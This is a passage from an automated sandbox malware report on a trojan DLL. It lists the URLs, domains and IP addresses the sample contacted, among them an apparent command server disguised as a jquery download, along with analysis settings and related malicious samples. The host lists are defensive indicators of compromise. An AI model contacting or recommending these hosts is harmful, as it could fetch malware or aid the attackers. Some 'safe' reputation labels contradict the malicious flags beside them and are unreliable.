                  http://mohsinkhanfoundation.com/pcQLeLMbur/BhkbJH0afC8dDiEzQn12eWR6endleGV70%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/ACA4KhwTDH8VH3MrOQp8GAYHIjZ4egBFfnJ4ZX15c2R5Yng=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/HiQBOhomAh0dCDgeJjoHLj8YCUZ6c3lifn1yZX5hfA==0%Avira URL Cloudsafe
                  https://tuxsecuritybiness.com/100%Avira URL Cloudmalware
                  http://lendbiz.vn/xj3BhHtMbf/fTB4IBwfOiwYPxk6GRosPCV9BAJzPwp0C3IvDkV+cnhlfXlzZHlieA==0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/MSMDOB0pBQ5+OnNDenV9ZXt9dGF5ZHw=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/fSkCegETcg8VKw95Qn12eWR6endleGV70%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/cjsfHAk/MzgAfhp+DBgAGz0PeyQgQ3p1fWV7fXRheWR80%Avira URL Cloudsafe
                  http://lendbiz.vn/xj3BhHtMbf/PnwTCj8/DwIceXNDenV9ZXt9dGF5ZHw=0%Avira URL Cloudsafe
                  http://lendbiz.vn/xj3BhHtMbf/ew0TDR8RAgoIfT0bIEV+cnhlfXlzZHlieA==0%Avira URL Cloudsafe
                  orldofjain.com/lMsTA7tSYpe0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/ITIYRX5yeGV9eXNkeWJ40%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/PQAbfw19HyI5fiwAe38AIyccOiF8BwI+diQOQn12eWR6endleGV70%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/PAUpKBYYDz0bHQkGMRZ/eSJCfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  dadabhoy.pk/m6rQE94U0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/E30FFQogECw2GiUzekV+cnhlfXlzZHlieA==0%Avira URL Cloudsafe
                  altayaralsudani.net/SSUsPgb7PHgC0%Avira URL Cloudsafe
                  http://23.82.140.206/jquery-3.3.1.slim.min.js0%Avira URL Cloudsafe
                  https://23.82.140.206:8080/0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/DCwZNSYnBRJFfnJ4ZX15c2R5Yng=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/OSdCfXZ5ZHp6d2V4ZXs=0%Avira URL Cloudsafe
                  http://mohsinkhanfoundation.com/pcQLeLMbur/DRs5e3gJAw4gNkJ7cn5henxzYn1lfQ==0%Avira URL Cloudsafe
                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsVw100%Avira URL Cloudmalware

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  sirifinco.com
                  		162.215.253.14
                  		truetrue
                    		unknown
                    lendbiz.vn
                    		103.28.36.212
                    		truetrueunknown
                    mohsinkhanfoundation.com
                    		107.180.44.125
                    		truetrue
                      		unknown
                      hoteloaktree.com
                      		185.67.1.94
                      		truetrueunknown
                      tuxsecuritybiness.com
                      		unknown
                      		unknowntrue
                        		unknown
                        r3.i.lencr.org
                        		unknown
                        		unknownfalse
                          		unknown
                          ordpress17.com
                          		unknown
                          		unknowntrue
                            		unknown
                            x1.i.lencr.org
                            		unknown
                            		unknownfalse
                              		unknown
                              aterwellnessinc.com
                              		unknown
                              		unknowntrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://mohsinkhanfoundation.com/pcQLeLMbur/GAUAID5zCzE+BzoOJAtGenN5Yn59cmV+YXw=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://hoteloaktree.com/QthLWsZsVgb/OQsaDixzHTgtfjMcGypGenN5Yn59cmV+YXw=false
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/HiYFeTpyPng4KCF4Pzk8EQgqOQkgOA0PBUJ7cn5henxzYn1lfQ==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/eDkkAA0bInx9RnpzeWJ+fXJlfmF8true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/EgwSFkZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                		unknown
                                mohsinkhanfoundation.com/pcQLeLMburtrue
                                • Avira URL Cloud: safe
                                		low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfnJ4ZX15c2R5Yng=true
                                • Avira URL Cloud: safe
                                		unknown
                                hoteloaktree.com/QthLWsZsVgbtrue
                                • Avira URL Cloud: safe
                                		low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/eX0ALgEICTI4BRlyQn12eWR6endleGV7true
                                • Avira URL Cloud: safe
                                		unknown
                                111true
                                • Avira URL Cloud: safe
                                		low
                                http://lendbiz.vn/xj3BhHtMbf/OTo6JTgvJXgEPS9DenV9ZXt9dGF5ZHw=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/LDhzdH4lGnwaNw4PfworLCkHdSkEGjIvdnMoAkV+cnhlfXlzZHlieA==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/CXwgNgIIIXMeeQkPPhYCOUN6dX1le310YXlkfA==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/P34KJnkbASUWPzEYIgcWQntyfmF6fHNifWV9true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/AjlCfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/P3glHSkheRgAfBMIMgUiKCMaGD4dK0J9dnlkenp3ZXhlew==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/CAsZDz1/MEJ9dnlkenp3ZXhlew==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/Hh4hIBsEGSF/JgN9ARgdOCgSRX5yeGV9eXNkeWJ4true
                                • Avira URL Cloud: safe
                                		unknown
                                tuxsecuritybiness.comtrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/HDN9NScAAw8PKwEFMi0/JTI5PEZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                		unknown
                                nuevainfotech.com/xCNyTjzkoetrue
                                • Avira URL Cloud: safe
                                		low
                                aterwellnessinc.com/U7D0sswwptrue
                                • Avira URL Cloud: safe
                                		low
                                geosever.rs/ObHP1CHttrue
                                • Avira URL Cloud: safe
                                		low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/egl7fAgEMAQAAkJ7cn5henxzYn1lfQ==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/DClzfTsJDgA/AicrERgXCHsERX5yeGV9eXNkeWJ4true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/enl4GDYcBgIOewx5OBp/MiEbKDx8AkJ9dnlkenp3ZXhlew==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/MyYYFB8/BgEuIANyGHgkPAMsGDcYQ3p1fWV7fXRheWR8true
                                • Avira URL Cloud: safe
                                		unknown
                                armordetailing.rs/lgfrZb4Re6WOtrue
                                • Avira URL Cloud: safe
                                		low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/H0N6dX1le310YXlkfA==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/ES1CfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/JS4leCwTGiojLgAhfiAeJXl4JCkFHUJ9dnlkenp3ZXhlew==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/GB0tLyckQ3p1fWV7fXRheWR8true
                                • Avira URL Cloud: safe
                                		unknown
                                erogholding.com/GFM1QcCFktrue
                                • Avira URL Cloud: safe
                                		low
                                http://lendbiz.vn/xj3BhHtMbf/EQsPOCI9HT0CfXsGCQQcIA59PT18Q3p1fWV7fXRheWR8true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/OhpCfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                		unknown
                                lendbiz.vn/xj3BhHtMbftrue
                                • Avira URL Cloud: safe
                                		low
                                http://sirifinco.com/Urbhq9wO50j/ASk5Kx0SPR8lJjE5eTg9GkN6dX1le310YXlkfA==false
                                • Avira URL Cloud: safe
                                		unknown
                                http://sirifinco.com/Urbhq9wO50j/fXMKNg0nKzN/DA15DggBI0N6dX1le310YXlkfA==false
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/Hh8fPwgIJRkuIzgrOjp5HjovOkZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/ICYbCzstHxl+BhF4Jg5+GH0FRX5yeGV9eXNkeWJ4true
                                • Avira URL Cloud: safe
                                		unknown
                                lefrenchwineclub.com/eRUGdDoxtrue
                                • Avira URL Cloud: safe
                                		low
                                acdlimited.com/2u6aW9Pfetrue
                                • Avira URL Cloud: safe
                                		low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/JhANAzl6Gw8FBhMABRYGcn9CfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/GzsaeR8FDw4qOh8mCAR2HDoCFS4bAhxFfnJ4ZX15c2R5Yng=true
                                • Avira URL Cloud: safe
                                		unknown
                                ordpress17.com/5WG6Z62sKWotrue
                                • Avira URL Cloud: safe
                                		low
                                jornaldasoficinas.com/ZF8GKIGVDupLtrue
                                • Avira URL Cloud: safe
                                		low
                                sirifinco.com/Urbhq9wO50jtrue
                                • Avira URL Cloud: safe
                                		low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/DxMffwwOHXMHeXJDenV9ZXt9dGF5ZHw=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/EgwECwQhMhk+BQkuH38nHQUtIy4GLwpFfnJ4ZX15c2R5Yng=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/fxgDNT4yEngregozMnp+J0N6dX1le310YXlkfA==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/KQsyKkZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://lendbiz.vn/xj3BhHtMbf/cxAvGkZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                		unknown
                                sjgrand.lk/zvMYuQqEZjtrue
                                • Avira URL Cloud: safe
                                		low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/BhkbJH0afC8dDiEzQn12eWR6endleGV7true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/ACA4KhwTDH8VH3MrOQp8GAYHIjZ4egBFfnJ4ZX15c2R5Yng=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/HiQBOhomAh0dCDgeJjoHLj8YCUZ6c3lifn1yZX5hfA==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://lendbiz.vn/xj3BhHtMbf/fTB4IBwfOiwYPxk6GRosPCV9BAJzPwp0C3IvDkV+cnhlfXlzZHlieA==true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/MSMDOB0pBQ5+OnNDenV9ZXt9dGF5ZHw=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/fSkCegETcg8VKw95Qn12eWR6endleGV7true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/cjsfHAk/MzgAfhp+DBgAGz0PeyQgQ3p1fWV7fXRheWR8true
                                • Avira URL Cloud: safe
                                		unknown
                                http://lendbiz.vn/xj3BhHtMbf/PnwTCj8/DwIceXNDenV9ZXt9dGF5ZHw=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://lendbiz.vn/xj3BhHtMbf/ew0TDR8RAgoIfT0bIEV+cnhlfXlzZHlieA==true
                                • Avira URL Cloud: safe
                                		unknown
                                orldofjain.com/lMsTA7tSYpetrue
                                • Avira URL Cloud: safe
                                		low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/ITIYRX5yeGV9eXNkeWJ4true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/PQAbfw19HyI5fiwAe38AIyccOiF8BwI+diQOQn12eWR6endleGV7true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/PAUpKBYYDz0bHQkGMRZ/eSJCfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                		unknown
                                dadabhoy.pk/m6rQE94Utrue
                                • Avira URL Cloud: safe
                                		low
                                http://mohsinkhanfoundation.com/pcQLeLMbur/E30FFQogECw2GiUzekV+cnhlfXlzZHlieA==true
                                • Avira URL Cloud: safe
                                		unknown
                                altayaralsudani.net/SSUsPgb7PHgCtrue
                                • Avira URL Cloud: safe
                                		low
                                http://23.82.140.206/jquery-3.3.1.slim.min.jstrue
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/DCwZNSYnBRJFfnJ4ZX15c2R5Yng=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/OSdCfXZ5ZHp6d2V4ZXs=true
                                • Avira URL Cloud: safe
                                		unknown
                                http://mohsinkhanfoundation.com/pcQLeLMbur/DRs5e3gJAw4gNkJ7cn5henxzYn1lfQ==true
                                • Avira URL Cloud: safe
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://code.jquery.com/loaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.518421340.0000000002E90000.00000040.00000001.sdmp, loaddll32.exe, 00000000.00000002.519163002.0000000003760000.00000004.00000040.sdmpfalse
                                  		high
                                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsfwloaddll32.exe, 00000000.00000003.311329972.0000000003605000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsloaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.357019934.00000000035FD000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.324864290.0000000003605000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://ctldl.winIloaddll32.exe, 00000000.00000003.258956287.0000000000ABC000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://tuxsecuritybiness.com:8080/loaddll32.exe, 00000000.00000002.519109976.0000000003669000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://r3.i.lencr.org/0loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://r3.i.lencr.org/C8408FE5CA4467EE4DA84A76EF238FE3.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsmohsinkhanfoundation.comloaddll32.exe, 00000000.00000003.286730458.0000000000AB8000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://x1.c.lencr.org/0loaddll32.exe, 00000000.00000003.328566447.0000000000A99000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp, C8408FE5CA4467EE4DA84A76EF238FE30.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://x1.i.lencr.org/0loaddll32.exe, 00000000.00000003.328566447.0000000000A99000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.282801606.0000000004E6B000.00000004.00000001.sdmp, C8408FE5CA4467EE4DA84A76EF238FE30.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://r3.o.lencr.org0loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://code.jquery.com/1loaddll32.exe, 00000000.00000003.265875146.0000000003605000.00000004.00000001.sdmpfalse
                                    		high
                                    https://tuxsecuritybiness.com/vloaddll32.exe, 00000000.00000003.266948088.0000000000AB8000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D.0.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://cps.letsencrypt.org0loaddll32.exe, 00000000.00000003.286688126.0000000000AAC000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://23.82.140.206:8080/mpersonationloaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://tuxsecuritybiness.com/loaddll32.exe, 00000000.00000003.328522826.0000000000AB8000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://23.82.140.206:8080/loaddll32.exe, 00000000.00000002.518726141.0000000003587000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://tuxsecuritybiness.com:8080/jquery-3.3.1.min.jsVwloaddll32.exe, 00000000.00000002.518793363.0000000003593000.00000004.00000001.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    107.180.44.125
                                    		mohsinkhanfoundation.comUnited States
                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue
                                    185.67.1.94
                                    		hoteloaktree.comUkraine
                                    		196645HOSTPRO-ASUAtrue
                                    162.215.253.14
                                    		sirifinco.comUnited States
                                    		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                    23.82.140.206
                                    		unknownUnited States
                                    		393886LEASEWEB-USA-MIA-11UStrue
                                    103.28.36.212
                                    		lendbiz.vnViet Nam
                                    		131353NHANHOA-AS-VNNhanHoaSoftwarecompanyVNtrue

                                    Private

                                    IP
                                    192.168.2.1

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:491706
                                    Start date:27.09.2021
                                    Start time:20:24:46
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 9m 16s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:p2SijKiqgZ.dll
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                    Number of analysed new started processes analysed:26
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winDLL@6/10@207/6
                                    EGA Information:Failed
                                    HDC Information:
                                    • Successful, ratio: 67.6% (good quality ratio 65.9%)
                                    • Quality average: 76.4%
                                    • Quality standard deviation: 25.5%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .dll
                                    Warnings:
                                    Show All
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WerFault.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.189.173.22, 52.168.117.173, 2.22.153.126, 23.0.174.185, 23.0.174.200, 95.100.54.203, 20.50.102.62, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43, 20.82.210.154
                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, e8652.dscx.akamaiedge.net, onedsblobprdwus17.westus.cloudapp.azure.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    20:25:45API Interceptor300x Sleep call for process: loaddll32.exe modified
                                    20:25:58API Interceptor1x Sleep call for process: WerFault.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    185.67.1.94OUTSTANDING_INV_Statement_937931.xlsGet hashmaliciousBrowse
                                      162.215.253.1455scan payment copy.exeGet hashmaliciousBrowse
                                      • www.songsupdate.online/ug3/?6l=nbJIqvPCw7utp3ZpXYf6101lpxScChc3+8n/s68KKzIix+M6aCovxW/fnZRgzJR0dVOT5IrEbujXi0Z6&1b_=e078ibQ8THfXJ2yp
                                      23.82.140.206waff.xlsGet hashmaliciousBrowse
                                        103.28.36.212https://kbelectricals.co.in/varujy3/ox07-svj-94Get hashmaliciousBrowse

                                          Domains

                                          No context

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          AS-26496-GO-DADDY-COM-LLCUSInquiry-URGENT.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          ejecutable1.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          RFQ9003930 New Order.docGet hashmaliciousBrowse
                                          • 166.62.10.138
                                          MOQ-Request_0927210-006452.xlsxGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          DHL EXPRESS TESL#U0130MAT B#U0130LD#U0130R#U0130M#U0130 - AWB 9420174470.PDF.exeGet hashmaliciousBrowse
                                          • 148.72.246.52
                                          fmS6YYhBy1Get hashmaliciousBrowse
                                          • 148.72.252.161
                                          L3Gl0GugHoGet hashmaliciousBrowse
                                          • 208.109.110.202
                                          test1.dllGet hashmaliciousBrowse
                                          • 148.66.136.190
                                          qkF3PCHVXs.xlsGet hashmaliciousBrowse
                                          • 148.72.53.144
                                          qkF3PCHVXs.xlsGet hashmaliciousBrowse
                                          • 148.72.53.144
                                          NS. ORDINE N. 141.exeGet hashmaliciousBrowse
                                          • 107.180.56.180
                                          cash payment.exeGet hashmaliciousBrowse
                                          • 107.180.56.180
                                          Swift_6408372.exeGet hashmaliciousBrowse
                                          • 107.180.56.180
                                          RFQ-847393.exeGet hashmaliciousBrowse
                                          • 107.180.56.180
                                          IX-08955.exeGet hashmaliciousBrowse
                                          • 166.62.10.136
                                          jKira.arm7Get hashmaliciousBrowse
                                          • 68.178.219.153
                                          HSBC94302,pdf.exeGet hashmaliciousBrowse
                                          • 184.168.131.241
                                          MOIUQ4354.vbsGet hashmaliciousBrowse
                                          • 107.180.72.43
                                          JIQKI7073.vbsGet hashmaliciousBrowse
                                          • 107.180.72.43
                                          Quotation -Scan001_No- 9300340731.doc.exeGet hashmaliciousBrowse
                                          • 107.180.56.180
                                          HOSTPRO-ASUA1wKONPeBx1.exeGet hashmaliciousBrowse
                                          • 185.67.3.52
                                          PURCHASE ORDER.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          Quote-TSL-1037174_4810.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          DENSCO QUOTE.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          MESCO TQZ24 QUOTE.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          TQZ23 DESCO MC.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          TQZ23 DESCO MC.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          DENSCO QUOTE.exeGet hashmaliciousBrowse
                                          • 194.28.84.37
                                          4Vy2EGhzNF.exeGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          2020tb3005.doc__.rtfGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          $RAULIU9.exeGet hashmaliciousBrowse
                                          • 91.239.233.22
                                          OUTSTANDING_INV_Statement_937931.xlsGet hashmaliciousBrowse
                                          • 185.67.1.94
                                          866-0001E ORDER AND SHIP.docGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          866-0001E ORDER AND SHIP.docGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          new order list.docGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          nX5xMoS3Pn.exeGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          tryb.docGet hashmaliciousBrowse
                                          • 193.169.188.252
                                          Order Specification.exeGet hashmaliciousBrowse
                                          • 185.156.42.252
                                          rib.exeGet hashmaliciousBrowse
                                          • 91.239.233.22
                                          https://ngor.zlen.com.ua/Restore/Click here to restore message automatically.htmlGet hashmaliciousBrowse
                                          • 91.239.235.5

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_93501137f7dee44608c963aa617a61e5ad25b8_82810a17_1bc2b2b4\Report.wer
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):12696
                                          Entropy (8bit):3.772558537541242
                                          Encrypted:false
                                          SSDEEP:192:PPiq0oXMHBUZMX4jed+Q/3iz/u7slS274ItWct:3i8XUBUZMX4je1w/u7slX4ItWct
                                          MD5:82C0D98D380460FA0A33B1F104F87E60
                                          SHA1:9C59D1CEEDB0CEA50025E1DEFF53000C425BDB19
                                          SHA-256:F2FC9492148068F4202C497D7DB8DFA6D7864DF7CE2EF9223C097068B1D5C964
                                          SHA-512:6C3E2260C6DE9A60CD3FC5A347E26314A6741CF283D0933394EF3544ADCB26D1ED25E2C222AC194D01A74324401874CCDBCCB6588D3138AC28A0580B3965A8D3
                                          Malicious:false
                                          Reputation:low
